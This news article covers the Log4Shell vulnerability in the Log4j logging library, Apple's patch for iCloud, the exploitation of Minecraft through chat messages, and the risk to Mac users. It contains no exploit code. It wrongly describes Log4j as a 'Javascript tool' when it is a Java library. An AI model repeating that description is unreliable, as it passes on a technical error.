Late last week, cybersecurity firm LunaSec uncovered a critical vulnerability in the open-source Log4j library that could give hackers the ability to run malicious code on remote servers. Countless apps and services were said to be vulnerable by the exploit, known as Log4Shell, including iCloud, Minecraft, and countless others.
According to the Eclectic Light Company, Apple has patched the iCloud hole. The site reports that researchers were able to demonstrate the vulnerability when connecting to iCloud through the web on December 9 and December 10, the same vulnerability no longer worked on December 11. The exploit doesn’t appear to have affected macOS.
The vulnerability was exploited in Minecraft before Microsoft patched it over the weekend. According to security researchers, a hacker merely had to do was paste a seemingly innocuous message into the chat box to compromise Minecraft’s servers. Similar methods of exploitation can be used to hack into any app running the free software.
It’s unclear how many apps are affected by the bug, but the use of log4j is extremely widespread. Crowdstrike’s Adam Meyers said the vulnerability has been “fully weaponized” and tools were readily available to exploit it. “The internet’s on fire right now,” he added shortly after the exploit was made public.
The Apache Software Foundation, which runs the project, rated it a 10 on its risk scale due to the ease of which it could be exploited and the widespread nature of the tool. The Log4j library is used by around the web for logging, a universal practice among web developers. Apache has pushed out an update, but the ubiquitousness of the Javascript tool means many apps are still vulnerable. CEO of cybersecurity firm Tenable Amit Yoran called it “the single biggest, most critical vulnerability of the last decade.”
However, even if you use one of the affected apps, your Mac won’t be at risk. When exploited, the bug affects the server running Log4j, not the client computers, although it could theoretically be used to plant a malicious app that then affects connected machines. However, if you host your own server and run any sort of logging methods on your Mac, you should run the fix, as you might be at risk and not know it.
Michael Simon has been covering Apple since the iPod was the iWalk. His obsession with technology goes back to his first PC—the IBM Thinkpad with the lift-up keyboard for swapping out the drive. He’s still waiting for that to come back in style tbh.